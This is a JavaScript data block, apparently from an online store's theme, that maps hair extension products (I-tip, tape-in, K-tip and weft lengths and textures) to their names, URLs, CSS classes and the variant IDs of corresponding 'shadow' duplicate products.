                    var product_short_data = [];
                    // I-tip 20
                    product_short_data[2277212454971] = [];
                    product_short_data[2277212454971]['short_name'] = 'I-tip 20"';
                    product_short_data[2277212454971]['url'] = '/products/i-tip-20';
                    product_short_data[2277212454971]['class'] = 'sm--i-tip';
                    // I-tip 20 STRAIGHT
                    product_short_data[6772685176982] = [];
                    product_short_data[6772685176982]['short_name'] = 'I-tip 20" Straight';
                    product_short_data[6772685176982]['url'] = '/products/i-tip-20-straight';
                    product_short_data[6772685176982]['class'] = 'sm--i-tip';
                    // I-tip 20 WAVY
                    product_short_data[6772692385942] = [];
                    product_short_data[6772692385942]['short_name'] = 'I-tip 20" Wavy';
                    product_short_data[6772692385942]['url'] = '/products/i-tip-20-wavy';
                    product_short_data[6772692385942]['class'] = 'sm--i-tip';

                    // I-tip 24
                    product_short_data[2278214533179] = [];
                    product_short_data[2278214533179]['short_name'] = 'I-tip 24"';
                    product_short_data[2278214533179]['url'] = '/products/i-tip-24';
                    product_short_data[2278214533179]['class'] = 'sm--i-tip';
                    // I-tip 24 STRAIGHT
                    product_short_data[6772712964246] = [];
                    product_short_data[6772712964246]['short_name'] = 'I-tip 24" Straight';
                    product_short_data[6772712964246]['url'] = '/products/i-tip-24-straight';
                    product_short_data[6772712964246]['class'] = 'sm--i-tip';
                    // I-tip 24 WAVY
                    product_short_data[6772719583382] = [];
                    product_short_data[6772719583382]['short_name'] = 'I-tip 24" Wavy';
                    product_short_data[6772719583382]['url'] = '/products/i-tip-24-wavy';
                    product_short_data[6772719583382]['class'] = 'sm--i-tip';

                    // Tape 20
                    product_short_data[2280999747643] = [];
                    product_short_data[2280999747643]['short_name'] = 'Tape In 20"';
                    product_short_data[2280999747643]['url'] = '/products/tape-20';
                    product_short_data[2280999747643]['class'] = 'sm--tape';
                    // Tape 20 STRAIGHT
                    product_short_data[6772894761110] = [];
                    product_short_data[6772894761110]['short_name'] = 'Tape In 20" Straight';
                    product_short_data[6772894761110]['url'] = '/products/tape-20-straight';
                    product_short_data[6772894761110]['class'] = 'sm--tape';
                    // Tape 20 WAVY
                    product_short_data[6772900626582] = [];
                    product_short_data[6772900626582]['short_name'] = 'Tape In 20" Wavy';
                    product_short_data[6772900626582]['url'] = '/products/tape-20-wavy';
                    product_short_data[6772900626582]['class'] = 'sm--tape';

                    // K-tip 20 Straight
                    product_short_data[6775689052310] = [];
                    product_short_data[6775689052310]['short_name'] = 'K-tip 20" Straight';
                    product_short_data[6775689052310]['url'] = '/products/k-tip-20-straight';
                    product_short_data[6775689052310]['class'] = 'sm--k-tip';
                    // K-tip 20 WAVY
                    product_short_data[6775739121814] = [];
                    product_short_data[6775739121814]['short_name'] = 'K-tip 20" Wavy';
                    product_short_data[6775739121814]['url'] = '/products/k-tip-20-wavy';
                    product_short_data[6775739121814]['class'] = 'sm--k-tip';

                    // Weft 20 STRAIGHT
                    product_short_data[6775789093014] = [];
                    product_short_data[6775789093014]['short_name'] = 'Weft 20" Straight';
                    product_short_data[6775789093014]['url'] = '/products/weft-20-straight';
                    product_short_data[6775789093014]['class'] = 'sm--weft';
                    // Weft 20 WAVY
                    product_short_data[6775816650902] = [];
                    product_short_data[6775816650902]['short_name'] = 'Weft 20" Wavy';
                    product_short_data[6775816650902]['url'] = '/products/weft-20-wavy';
                    product_short_data[6775816650902]['class'] = 'sm--weft';

                    // Weft 24 STRAIGHT
                    product_short_data[6775828086934] = [];
                    product_short_data[6775828086934]['short_name'] = 'Weft 24" Straight';
                    product_short_data[6775828086934]['url'] = '/products/weft-24-straight';
                    product_short_data[6775828086934]['class'] = 'sm--weft';
                    // Weft 24 WAVY
                    product_short_data[6775843881110] = [];
                    product_short_data[6775843881110]['short_name'] = 'Weft 24" Wavy';
                    product_short_data[6775843881110]['url'] = '/products/weft-24-wavy';
                    product_short_data[6775843881110]['class'] = 'sm--weft';

                    var shadow_products_map = [];
                    // I-tip 20 - Original product variant id first
                    shadow_products_map[2277212454971] = [];
                    shadow_products_map[2277212454971]['id'] = 2283829067835;
                    shadow_products_map[2277212454971]['url'] = '/products/i-tip-20-shadow';
                    shadow_products_map[2277212454971]['short_name'] = 'I-tip 20"';
                    shadow_products_map[2277212454971]['class'] = 'sm--i-tip';
                    shadow_products_map[2277212454971]['variants'] = '{"21151877300283":"21180362555451","21151876775995":"21180362063931","21396389199931":"21396392837179","21396388937787":"21396392706107","21396390051899":"21396392345659","21396389756987":"21396392214587","21396385464379":"21396391493691","21396385333307":"21396391297083","21356845727803":"21356854575163","21356845432891":"21356850085947","21151875858491":"21180361146427","21151875891259":"21180361179195","21151875924027":"21180361211963","21151875956795":"21180361244731","21151875989563":"21180361277499","21151876022331":"21180361310267","21151876055099":"21180361343035","21151876087867":"21180361375803","21151876120635":"21180361408571","21151876153403":"21180361441339","21151876186171":"21180361474107","21151876218939":"21180361506875","21151876251707":"21180361539643","21151876284475":"21180361572411","21151876317243":"21180361605179","21151876350011":"21180361637947","21151876382779":"21180361670715","21151876415547":"21180361703483","21151876448315":"21180361736251","21151876481083":"21180361769019","21151876513851":"21180361801787","21151876546619":"21180361834555","21151876579387":"21180361867323","21151876612155":"21180361900091","21151876644923":"21180361932859","21151876677691":"21180361965627","21151876710459":"21180361998395","21151876743227":"21180362031163","21151876808763":"21180362096699","21151876841531":"21180362129467","21151876874299":"21180362162235","21151876907067":"21180362195003","21151876939835":"21180362227771","21151876972603":"21180362260539","21151877005371":"21180362293307","21151877038139":"21180362326075","21151877070907":"21180362358843","21151877103675":"21180362391611","21151877136443":"21180362424379","21151877169211":"21180362457147","21151877201979":"21180362489915","21151877234747":"21180362522683","21151877333051":"21180362588219","21151877365819":"21180362620987","21151877398587":"21180362653755","21151877431355":"21180362686523","21151877464123":"21180362719291","21151877496891":"21180362752059","21151877529659":"21180362784827","21151877562427":"21180362817595","21151877595195":"21180362850363","21151877627963":"21180362883131","21151877660731":"21180362915899","21151877693499":"21180362948667","21151877726267":"21180362981435","21151877759035":"21180363014203","21151877791803":"21180363046971","21151877824571":"21180363079739","21151877857339":"21180363112507","21151877890107":"21180363145275","21151877922875":"21180363178043","21151877955643":"21180363210811","21151877988411":"21180363243579","21151878021179":"21180363276347","21151878053947":"21180363309115","21151878086715":"21180363341883","21151878119483":"21180363374651","21151878152251":"21180363407419","21151878185019":"21180363440187","21151878217787":"21180363472955","21151878250555":"21180363505723","21151878283323":"21180363538491","21151878447163":"21180363571259","21151878479931":"21180363604027","21151878512699":"21180363636795","21151878545467":"21180363669563","21151878578235":"21180363702331","21151878611003":"21180363735099","21151878643771":"21180363767867","21151878676539":"21180363800635","21151878709307":"21180363833403","21151878742075":"21180363866171","21151878774843":"21180363898939"}';
                    // I-tip 20 STRAIGHT - Original product variant id first
                    shadow_products_map[6772685176982] = [];
                    shadow_products_map[6772685176982]['id'] = 6772698415254;
                    shadow_products_map[6772685176982]['url'] = '/products/i-tip-20-straight-shadow';
                    shadow_products_map[6772685176982]['short_name'] = 'I-tip 20" Straight';
                    shadow_products_map[6772685176982]['class'] = 'sm--i-tip';
                    shadow_products_map[6772685176982]['variants'] = '{"39861407121558":39861434286230,"39861407154326":39861434318998,"39861407187094":39861434351766,"39861407219862":39861434384534,"39861407252630":39861434417302,"39861407285398":39861434450070,"39861407318166":39861434482838,"39861407350934":39861434515606,"39861407383702":39861434548374,"39861407416470":39861434581142,"39861407449238":39861434613910,"39861407482006":39861434646678,"39861407514774":39861434679446,"39861407547542":39861434712214,"39861407580310":39861434744982,"39861407613078":39861434777750,"39861407645846":39861434810518,"39861407678614":39861434843286,"39861407711382":39861434876054,"39861407744150":39861434908822,"39861407776918":39861434941590,"39861407809686":39861434974358,"39861407842454":39861435007126,"39861407875222":39861435039894,"39861407907990":39861435072662,"39861407940758":39861435105430,"39861407973526":39861435138198,"39861408006294":39861435170966,"39861408039062":39861435203734,"39861408071830":39861435236502,"39861408104598":39861435269270,"39861408137366":39861435302038,"39861408170134":39861435334806,"39861408202902":39861435400342,"39861408235670":39861435433110,"39861408268438":39861435465878,"39861408301206":39861435498646,"39861408333974":39861435531414,"39861408366742":39861435564182,"39861408399510":39861435596950,"39861408432278":39861435629718,"39861408465046":39861435662486,"39861408530582":39861435695254,"39861408563350":39861435728022,"39861408596118":39861435760790,"39861408628886":39861435793558,"39861408661654":39861435826326,"39861409972374":39861437137046,"39861410005142":39861437169814,"39861410037910":39861437202582,"39861410103446":39861437300886,"39861410234518":39861437333654,"40120938987670":40120939020438,"40120970903702":40120973131926,"40120988926102":40120984404118,"40121004753046":40121006260374,"40121017794710":40121017827478,"40121045450902":40121045516438}';
                    // I-tip 20 WAVY - Original product variant id first
                    shadow_products_map[6772692385942] = [];
                    shadow_products_map[6772692385942]['id'] = 6772704608406;
                    shadow_products_map[6772692385942]['url'] = '/products/i-tip-20-wavy-shadow';
                    shadow_products_map[6772692385942]['short_name'] = 'I-tip 20" Wavy';
                    shadow_products_map[6772692385942]['class'] = 'sm--i-tip';
                    shadow_products_map[6772692385942]['variants'] = '{"39861423243414":39861447098518,"39861423276182":39861447131286,"39861423308950":39861447164054,"39861423341718":39861447196822,"39861423374486":39861447229590,"39861423407254":39861447262358,"39861423440022":39861447295126,"39861423472790":39861447327894,"39861423538326":39861447360662,"39861423571094":39861447393430,"39861423603862":39861447426198,"39861423636630":39861447458966,"39861423669398":39861447491734,"39861423702166":39861447524502,"39861423734934":39861447557270,"39861423767702":39861447590038,"39861423800470":39861447622806,"39861423866006":39861447655574,"39861423898774":39861447688342,"39861423931542":39861447753878,"39861423964310":39861447786646,"39861423997078":39861447819414,"39861424029846":39861447852182,"39861424062614":39861447884950,"39861424095382":39861447917718,"39861424128150":39861447950486,"39861424160918":39861447983254,"39861424193686":39861448016022,"39861424226454":39861448048790,"39861424259222":39861448081558,"39861424291990":39861448114326,"39861424324758":39861448147094,"39861424357526":39861448179862,"39861424390294":39861448212630,"39861424423062":39861448245398,"39861424455830":39861448278166,"39861424488598":39861448310934,"39861424521366":39861448343702,"39861424554134":39861448376470,"39861424586902":39861448409238,"39861424652438":39861448474774,"39861424717974":39861448507542,"39861424750742":39861448605846,"40120939151510":40120939184278,"40120970969238":40120971034774,"40120984535190":40120986534038,"40121002000534":40121002033302,"40121017860246":40121017925782,"40121040273558":40121041191062}';

                    // I-tip 24 - Original product variant id first
                    shadow_products_map[2278214533179] = [];
                    shadow_products_map[2278214533179]['id'] = 2287559475259;
                    shadow_products_map[2278214533179]['url'] = '/products/i-tip-24-shadow';
                    shadow_products_map[2278214533179]['short_name'] = 'I-tip 24"';
                    shadow_products_map[2278214533179]['class'] = 'sm--i-tip';
                    shadow_products_map[2278214533179]['variants'] = '{"21396424523835":"21396424556603","21396424327227":"21396424359995","21396422885435":"21396422918203","21396422688827":"21396422754363","21396422197307":"21396422230075","21396422000699":"21396422033467","21155238477883":"21196402524219","21155238510651":"21196402556987","21155238543419":"21196402589755","21155238576187":"21196402622523","21155238608955":"21196402655291","21155238641723":"21196402688059","21155238674491":"21196402720827","21155238707259":"21196402753595","21155238740027":"21196402786363","21155238772795":"21196402819131","21155238805563":"21196402851899","21155238838331":"21196402884667","21155238871099":"21196402917435","21155238903867":"21196402950203","21155238936635":"21196402982971","21155238969403":"21196403015739","21155239002171":"21196403048507","21155239034939":"21196403081275","21155239067707":"21196403114043","21155239100475":"21196403146811","21155239133243":"21196403179579","21155239166011":"21196403212347","21155239198779":"21196403245115","21155239231547":"21196403277883","21155239264315":"21196403310651","21155239297083":"21196403343419","21155239329851":"21196403408955","21155239362619":"21196403441723","21155239395387":"21196403474491","21155239428155":"21196403507259","21155239460923":"21196403540027","21155239493691":"21196403572795","21155239526459":"21196403605563","21155239559227":"21196403638331","21155239591995":"21196403671099","21155239624763":"21196403703867","21155239657531":"21196403736635","21155239690299":"21196403769403","21155239723067":"21196403802171","21155239755835":"21196403834939","21155239788603":"21196403867707","21155239821371":"21196403900475","21155239854139":"21196403933243","21155239886907":"21196403966011","21155239919675":"21196403998779","21155239952443":"21196404031547","21155239985211":"21196404064315","21155240017979":"21196404097083","21155240050747":"21196404129851","21155240083515":"21196404162619","21155240116283":"21196404195387","21155240149051":"21196404228155","21155240181819":"21196404260923","21155240214587":"21196404293691","21155240247355":"21196404326459","21155240280123":"21196404359227","21155240312891":"21196404391995","21155240345659":"21196404424763","21155240378427":"21196404457531","21155240411195":"21196404490299","21155240443963":"21196404523067","21155240476731":"21196404555835","21155240509499":"21196404588603","21155240542267":"21196404621371","21155240575035":"21196404654139","21155240607803":"21196404686907","21155240640571":"21196404719675","21155240673339":"21196404752443","21155240706107":"21196404785211","21155240738875":"21196404817979","21155240771643":"21196404850747","21155240804411":"21196404883515","21155240837179":"21196404916283","21155240869947":"21196404949051","21155240902715":"21196404981819","21155240935483":"21196405014587","21155240968251":"21196405047355","21155241001019":"21196405080123","21155241033787":"21196405112891","21155241066555":"21196405145659","21155241099323":"21196405178427","21155241132091":"21196405211195","21155241164859":"21196405243963","21155241197627":"21196405276731","21155241230395":"21196405309499"}';
                    // I-tip 24 STRAIGHT - Original product variant id first
                    shadow_products_map[6772712964246] = [];
                    shadow_products_map[6772712964246]['id'] = 6772726431894;
                    shadow_products_map[6772712964246]['url'] = '/products/i-tip-24-straight-shadow';
                    shadow_products_map[6772712964246]['short_name'] = 'I-tip 24" Straight';
                    shadow_products_map[6772712964246]['class'] = 'sm--i-tip';
                    shadow_products_map[6772712964246]['variants'] = '{"39861460893846":39861481078934,"39861460926614":39861481111702,"39861460959382":39861481144470,"39861460992150":39861481177238,"39861461024918":39861481242774,"39861461057686":39861481275542,"39861461090454":39861481341078,"39861461123222":39861481373846,"39861461155990":39861481406614,"39861461188758":39861481439382,"39861461221526":39861481472150,"39861461254294":39861481504918,"39861461287062":39861481537686,"39861461319830":39861481570454,"39861461352598":39861481603222,"39861461385366":39861481635990,"39861461418134":39861481668758,"39861461450902":39861481701526,"39861461483670":39861481734294,"39861461516438":39861481767062,"39861461581974":39861481799830,"39861461614742":39861481832598,"39861461647510":39861481865366,"39861461680278":39861481898134,"39861461713046":39861481930902,"39861461745814":39861481963670,"39861461778582":39861481996438,"39861461811350":39861482029206,"39861461844118":39861482061974,"39861461876886":39861482094742,"39861461909654":39861482127510,"39861461942422":39861482160278,"39861461975190":39861482193046,"39861462007958":39861482225814,"39861462040726":39861482258582,"39861462073494":39861482291350,"39861462106262":39861482324118,"39861462139030":39861482356886,"39861463384214":39861483602070,"39861463482518":39861483700374,"39861463515286":39861483733142,"40120939348118":40120946229398,"40120971165846":40120971198614,"40120987254934":40120989024406,"40121002098838":40121002131606,"40121021464726":40121021530262,"40121041289366":40121041322134}';
                    // I-tip 24 WAVY - Original product variant id first
                    shadow_products_map[6772719583382] = [];
                    shadow_products_map[6772719583382]['id'] = 6772733608086;
                    shadow_products_map[6772719583382]['url'] = '/products/i-tip-24-wavy-shadow';
                    shadow_products_map[6772719583382]['short_name'] = 'I-tip 24" Wavy';
                    shadow_products_map[6772719583382]['class'] = 'sm--i-tip';
                    shadow_products_map[6772719583382]['variants'] = '{"39861475803286":39861496152214,"39861475836054":39861496184982,"39861475868822":39861496217750,"39861475901590":39861496250518,"39861475967126":39861496283286,"39861475999894":39861496316054,"39861476032662":39861496348822,"39861476065430":39861496381590,"39861476098198":39861496414358,"39861476130966":39861496479894,"39861476163734":39861496512662,"39861476196502":39861496545430,"39861476229270":39861496578198,"39861476262038":39861496610966,"39861476294806":39861496643734,"39861476327574":39861496676502,"39861476360342":39861496709270,"39861476393110":39861496742038,"39861476425878":39861496774806,"39861476458646":39861496807574,"39861476491414":39861496840342,"39861476524182":39861496873110,"39861476556950":39861496938646,"39861476589718":39861496971414,"39861476622486":39861497004182,"39861476655254":39861497036950,"39861476688022":39861497069718,"39861476720790":39861497102486,"39861476753558":39861497135254,"39861476786326":39861497168022,"39861476819094":39861497200790,"39861476851862":39861497233558,"39861476884630":39861497266326,"39861476917398":39861497299094,"39861476950166":39861497331862,"39861476982934":39861497364630,"39861477015702":39861497397398,"39861477081238":39861497462934,"39861477114006":39861497495702,"39861477212310":39861497594006,"40120946000022":40120945901718,"40120973426838":40120973492374,"40120989089942":40120989221014,"40121002197142":40121006358678,"40121021563030":40121021661334,"40121045581974":40121047253142}';

                    // Tape 20 - Original product variant id first
                    shadow_products_map[2280999747643] = [];
                    shadow_products_map[2280999747643]['id'] = 2287480340539;
                    shadow_products_map[2280999747643]['url'] = '/products/tape-20-shadow';
                    shadow_products_map[2280999747643]['short_name'] = 'Tape 20"';
                    shadow_products_map[2280999747643]['class'] = 'sm--tape';
                    shadow_products_map[2280999747643]['variants'] = '{"21167873032251":"21196286623803","21167872540731":"21196286132283","21396432453691":"21396432519227","21396431962171":"21396432388155","21396430848059":"21396430880827","21396430684219":"21396430716987","21396429537339":"21396429602875","21396429439035":"21396429504571","21356893339707":"21356893700155","21356894552123":"21356896747579","21167871623227":"21196285214779","21167871655995":"21196285247547","21167871688763":"21196285280315","21167871721531":"21196285313083","21167871754299":"21196285345851","21167871787067":"21196285378619","21167871819835":"21196285411387","21167871852603":"21196285444155","21167871885371":"21196285476923","21167871918139":"21196285509691","21167871950907":"21196285542459","21167871983675":"21196285575227","21167872016443":"21196285607995","21167872049211":"21196285640763","21167872081979":"21196285673531","21167872114747":"21196285706299","21167872147515":"21196285739067","21167872180283":"21196285771835","21167872213051":"21196285804603","21167872245819":"21196285837371","21167872278587":"21196285870139","21167872311355":"21196285902907","21167872344123":"21196285935675","21167872376891":"21196285968443","21167872409659":"21196286001211","21167872442427":"21196286033979","21167872475195":"21196286066747","21167872507963":"21196286099515","21167872573499":"21196286165051","21167872606267":"21196286197819","21167872639035":"21196286230587","21167872671803":"21196286263355","21167872704571":"21196286296123","21167872737339":"21196286328891","21167872770107":"21196286361659","21167872802875":"21196286394427","21167872835643":"21196286427195","21167872868411":"21196286459963","21167872901179":"21196286492731","21167872933947":"21196286525499","21167872966715":"21196286558267","21167872999483":"21196286591035","21167873065019":"21196286656571","21167873097787":"21196286689339","21167873130555":"21196286722107","21167873163323":"21196286754875","21167873196091":"21196286787643","21167873228859":"21196286820411","21167873261627":"21196286853179","21167873294395":"21196286885947","21167873327163":"21196286918715","21167873359931":"21196286951483","21167873392699":"21196286984251","21167873425467":"21196287017019","21167873458235":"21196287049787","21167873491003":"21196287082555","21167873523771":"21196287115323","21167873556539":"21196287148091","21167873589307":"21196287180859","21167873622075":"21196287213627","21167873654843":"21196287246395","21167873687611":"21196287279163","21167873720379":"21196287311931","21167873753147":"21196287344699","21167873785915":"21196287377467","21167873818683":"21196287410235","21167873851451":"21196287443003","21167873884219":"21196287475771","21167873916987":"21196287508539","21167873949755":"21196287541307","21167873982523":"21196287574075","21167874015291":"21196287606843","21167874048059":"21196287639611","21167874080827":"21196287672379","21167874113595":"21196287705147","21167874146363":"21196287737915","21167874179131":"21196287770683","21167874211899":"21196287803451","21167874244667":"21196287836219","21167874277435":"21196287868987","21167874310203":"21196287901755","21167874342971":"21196287934523","21167874375739":"21196287967291"}';
                    // Tape 20 STRAIGHT - Original product variant id first
                    shadow_products_map[6772894761110] = [];
                    shadow_products_map[6772894761110]['id'] = 6772907966614;
                    shadow_products_map[6772894761110]['url'] = '/products/tape-20-straight-shadow';
                    shadow_products_map[6772894761110]['short_name'] = 'Tape 20" Straight';
                    shadow_products_map[6772894761110]['class'] = 'sm--tape';
                    shadow_products_map[6772894761110]['variants'] = '{"39861717565590":39861756592278,"39861717598358":39861756625046,"39861717631126":39861756657814,"39861717663894":39861756690582,"39861717696662":39861756723350,"39861717729430":39861756756118,"39861717762198":39861756788886,"39861717794966":39861756821654,"39861717827734":39861756854422,"39861717860502":39861756887190,"39861717893270":39861756919958,"39861717926038":39861756985494,"39861717958806":39861757018262,"39861717991574":39861757051030,"39861718024342":39861757083798,"39861718057110":39861757116566,"39861718089878":39861757149334,"39861718122646":39861757182102,"39861718155414":39861757214870,"39861718188182":39861757247638,"39861718220950":39861757280406,"39861718253718":39861757313174,"39861718286486":39861757345942,"39861718319254":39861757378710,"39861718352022":39861757411478,"39861718384790":39861757444246,"39861718417558":39861757477014,"39861718450326":39861757509782,"39861718483094":39861757542550,"39861718515862":39861757608086,"39861718548630":39861757640854,"39861718581398":39861757673622,"39861718614166":39861757706390,"39861718646934":39861757739158,"39861718679702":39861757771926,"39861718712470":39861757804694,"39861718745238":39861757837462,"39861718778006":39861757870230,"39861718810774":39861757902998,"39861718843542":39861757935766,"39861718876310":39861757968534,"39861718909078":39861758001302,"39861718941846":39861758034070,"39861718974614":39861758066838,"39861719007382":39861758099606,"39861719040150":39861758132374,"39861719072918":39861758165142,"39861720481942":39861759508630,"39861720514710":39861759541398,"39861720547478":39861759574166,"39861720645782":39861759672470,"39861720678550":39861759705238,"40120939774102":40120939937942,"40120971493526":40120971526294,"40120987320470":40120987353238,"40121006391446":40121006424214,"40121021759638":40121021792406,"40121047318678":40121047351446}';
                    // Tape 20 WAVY - Original product variant id first
                    shadow_products_map[6772900626582] = [];
                    shadow_products_map[6772900626582]['id'] = 6772914061462;
                    shadow_products_map[6772900626582]['url'] = '/products/tape-20-wavy-shadow';
                    shadow_products_map[6772900626582]['short_name'] = 'Tape 20" Wavy';
                    shadow_products_map[6772900626582]['class'] = 'sm--tape';
                    shadow_products_map[6772900626582]['variants'] = '{"39861734375574":39861779333270,"39861734408342":39861779366038,"39861734441110":39861779398806,"39861734473878":39861779431574,"39861734506646":39861779464342,"39861734539414":39861779497110,"39861734572182":39861779529878,"39861734604950":39861779562646,"39861734637718":39861779595414,"39861734670486":39861779628182,"39861734703254":39861779660950,"39861734736022":39861779693718,"39861734768790":39861779726486,"39861734801558":39861779759254,"39861734834326":39861779792022,"39861734867094":39861779824790,"39861734899862":39861779890326,"39861734932630":39861779923094,"39861734965398":39861779955862,"39861734998166":39861779988630,"39861735030934":39861780021398,"39861735063702":39861780054166,"39861735096470":39861780086934,"39861735129238":39861780119702,"39861735162006":39861780152470,"39861735194774":39861780185238,"39861735227542":39861780218006,"39861735260310":39861780250774,"39861735293078":39861780283542,"39861735325846":39861780316310,"39861735358614":39861780349078,"39861735391382":39861780414614,"39861735424150":39861780447382,"39861735489686":39861780480150,"39861735522454":39861780512918,"39861735555222":39861780545686,"39861735587990":39861780578454,"39861735620758":39861780611222,"39861735653526":39861780643990,"39861735686294":39861780676758,"39861735751830":39861780742294,"39861735784598":39861780775062,"39861735882902":39861780873366,"40120940134550":40120944951446,"40120971559062":40120971624598,"40120987386006":40120987418774,"40121002328214":40121002360982,"40121022054550":40121024086166,"40121041453206":40121041518742}';

                    // K-tip 20 STRAIGHT - Original product variant id first
                    shadow_products_map[6775689052310] = [];
                    shadow_products_map[6775689052310]['id'] = 6775699669142;
                    shadow_products_map[6775689052310]['url'] = '/products/k-tip-20-straight-shadow';
                    shadow_products_map[6775689052310]['short_name'] = 'K-tip 20" Straight';
                    shadow_products_map[6775689052310]['class'] = 'sm--k-tip';
                    shadow_products_map[6775689052310]['variants'] = '{"39869155049622":39869198925974,"39869155082390":39869198958742,"39869155115158":39869198991510,"39869155147926":39869199024278,"39869155180694":39869199057046,"39869155213462":39869199089814,"39869155246230":39869199122582,"39869155278998":39869199155350,"39869155311766":39869199188118,"39869155344534":39869199220886,"39869155377302":39869199253654,"39869155410070":39869199286422,"39869155442838":39869199319190,"39869155475606":39869199351958,"39869155508374":39869199384726,"39869155541142":39869199417494,"39869155573910":39869199450262,"39869155606678":39869199483030,"39869155639446":39869199515798,"39869155672214":39869199548566,"39869155704982":39869199581334,"39869155737750":39869199614102,"39869155770518":39869199646870,"39869155803286":39869199679638,"39869155836054":39869199712406,"39869155868822":39869199745174,"39869155901590":39869199777942,"39869155934358":39869199810710,"39869155967126":39869199843478,"39869155999894":39869199876246,"39869156032662":39869199909014,"39869156065430":39869199941782,"39869156098198":39869199974550,"39869156130966":39869200007318,"39869156163734":39869200040086,"39869156196502":39869200072854,"39869156229270":39869200105622,"39869156262038":39869200138390,"39869156294806":39869200171158,"39869156327574":39869200203926,"39869156360342":39869200236694,"39869156393110":39869200269462,"39869156425878":39869200302230,"39869156458646":39869200334998,"39869156491414":39869200367766,"39869156556950":39869200400534,"39869156589718":39869200433302,"39869156622486":39869200466070,"39869156655254":39869200498838,"39869156688022":39869200531606,"39869156720790":39869200564374,"39869156753558":39869200597142,"40120917491862":40120917557398,"40120969855126":40120969887894,"40120982503574":40120982765718,"40121001312406":40121001345174,"40121014550678":40121014583446,"40121037193366":40121037258902}';
                    // K-tip 20 WAVY - Original product variant id first
                    shadow_products_map[6775739121814] = [];
                    shadow_products_map[6775739121814]['id'] = 6775749738646;
                    shadow_products_map[6775739121814]['url'] = '/products/k-tip-20-wavy-shadow';
                    shadow_products_map[6775739121814]['short_name'] = 'K-tip 20" Wavy';
                    shadow_products_map[6775739121814]['class'] = 'sm--k-tip';
                    shadow_products_map[6775739121814]['variants'] = '{"39869308633238":39869374103702,"39869308666006":39869374136470,"39869308698774":39869374169238,"39869308731542":39869374202006,"39869308764310":39869374234774,"39869308797078":39869374267542,"39869308829846":39869374300310,"39869308862614":39869374333078,"39869308895382":39869374365846,"39869308928150":39869374398614,"39869308960918":39869374431382,"39869308993686":39869374464150,"39869309026454":39869374496918,"39869309059222":39869374529686,"39869309091990":39869374562454,"39869309124758":39869374595222,"39869309157526":39869374627990,"39869309190294":39869374660758,"39869309223062":39869374693526,"39869309255830":39869374726294,"39869309288598":39869374759062,"39869309321366":39869374791830,"39869309354134":39869374824598,"39869309386902":39869374857366,"39869309419670":39869374890134,"39869309452438":39869374922902,"39869309485206":39869374955670,"39869309517974":39869374988438,"39869309550742":39869375021206,"39869309583510":39869375053974,"39869309616278":39869375086742,"39869309649046":39869375119510,"39869309681814":39869375152278,"39869309714582":39869375185046,"39869309747350":39869375217814,"39869309780118":39869375250582,"39869309812886":39869375283350,"39869309845654":39869375316118,"39869309878422":39869375348886,"39869309911190":39869375381654,"39869309943958":39869375414422,"39869309976726":39869375447190,"39869310009494":39869375479958,"40120937906326":40120937971862,"40120969953430":40120970248342,"40120982798486":40120982831254,"40121001443478":40121001476246,"40121014780054":40121014911126,"40121037291670":40121037324438}';

                    // Weft 20 STRAIGHT - Original product variant id first
                    shadow_products_map[6775789093014] = [];
                    shadow_products_map[6775789093014]['id'] = 6775810621590;
                    shadow_products_map[6775789093014]['url'] = '/products/weft-20-straight-shadow';
                    shadow_products_map[6775789093014]['short_name'] = 'Weft 20" Straight';
                    shadow_products_map[6775789093014]['class'] = 'sm--weft';
                    shadow_products_map[6775789093014]['variants'] = '{"39869475979414":39869529030806,"39869476012182":39869529063574,"39869476044950":39869529096342,"39869476077718":39869529129110,"39869476110486":39869529161878,"39869476143254":39869529194646,"39869476176022":39869529227414,"39869476208790":39869529260182,"39869476241558":39869529292950,"39869476274326":39869529325718,"39869476307094":39869529358486,"39869476339862":39869529391254,"39869476372630":39869529424022,"39869476405398":39869529456790,"39869476438166":39869529489558,"39869476470934":39869529522326,"39869476503702":39869529555094,"39869476536470":39869529587862,"39869476569238":39869529620630,"39869476602006":39869529653398,"39869476634774":39869529686166,"39869476667542":39869529718934,"39869476700310":39869529751702,"39869476733078":39869529784470,"39869476765846":39869529817238,"39869476831382":39869529850006,"39869476864150":39869529882774,"39869476896918":39869529915542,"39869476929686":39869529948310,"39869476962454":39869529981078,"39869476995222":39869530013846,"39869477027990":39869530046614,"39869477060758":39869530079382,"39869477093526":39869530112150,"39869477126294":39869530144918,"39869477159062":39869530177686,"39869477191830":39869530210454,"39869477224598":39869530243222,"39869477257366":39869530275990,"39869477290134":39869530308758,"39869477322902":39869530374294,"39869477355670":39869530407062,"39869477388438":39869530439830,"39869477421206":39869530472598,"39869477453974":39869530505366,"39869477486742":39869530538134,"39869477519510":39869530570902,"39869477617814":39869530669206,"39869477650582":39869530701974,"39869477683350":39869530734742,"40120938004630":40120938037398,"40120970346646":40120970543254,"40120982896790":40120984240278,"40121001509014":40121001541782,"40121015042198":40121015140502,"40121037357206":40121037389974,"40949937963158":40949944778902,"40949982134422":40949982167190}';
                    // Weft 20 WAVY - Original product variant id first
                    shadow_products_map[6775816650902] = [];
                    shadow_products_map[6775816650902]['id'] = 6775824187542;
                    shadow_products_map[6775816650902]['url'] = '/products/weft-20-wavy-shadow';
                    shadow_products_map[6775816650902]['short_name'] = 'Weft 20" Wavy';
                    shadow_products_map[6775816650902]['class'] = 'sm--weft';
                    shadow_products_map[6775816650902]['variants'] = '{"39869542891670":39869562847382,"39869542924438":39869562880150,"39869542957206":39869562912918,"39869542989974":39869562945686,"39869543022742":39869562978454,"39869543055510":39869563011222,"39869543088278":39869563043990,"39869543121046":39869563076758,"39869543153814":39869563109526,"39869543186582":39869563142294,"39869543219350":39869563175062,"39869543252118":39869563207830,"39869543284886":39869563240598,"39869543317654":39869563273366,"39869543350422":39869563306134,"39869543383190":39869563338902,"39869543415958":39869563371670,"39869543448726":39869563404438,"39869543514262":39869563437206,"39869543579798":39869563469974,"39869543612566":39869563502742,"39869543645334":39869563535510,"39869543678102":39869563568278,"39869543710870":39869563601046,"39869543743638":39869563633814,"39869543776406":39869563666582,"39869543809174":39869563699350,"39869543841942":39869563732118,"39869543874710":39869563764886,"39869543907478":39869563797654,"39869543940246":39869563830422,"39869543973014":39869563863190,"39869544005782":39869563895958,"39869544038550":39869563928726,"39869544104086":39869563961494,"39869544169622":39869563994262,"39869544202390":39869564027030,"39869544235158":39869564059798,"39869544333462":39869564158102,"39869544366230":39869564190870,"39869544398998":39869564223638,"40120938070166":40120938332310,"40120970576022":40120970608790,"40120984273046":40120984305814,"40121001640086":40121001705622,"40121015238806":40121015337110,"40121037488278":40121037553814,"40949941502102":40949942583446,"40949982199958":40949982298262}';

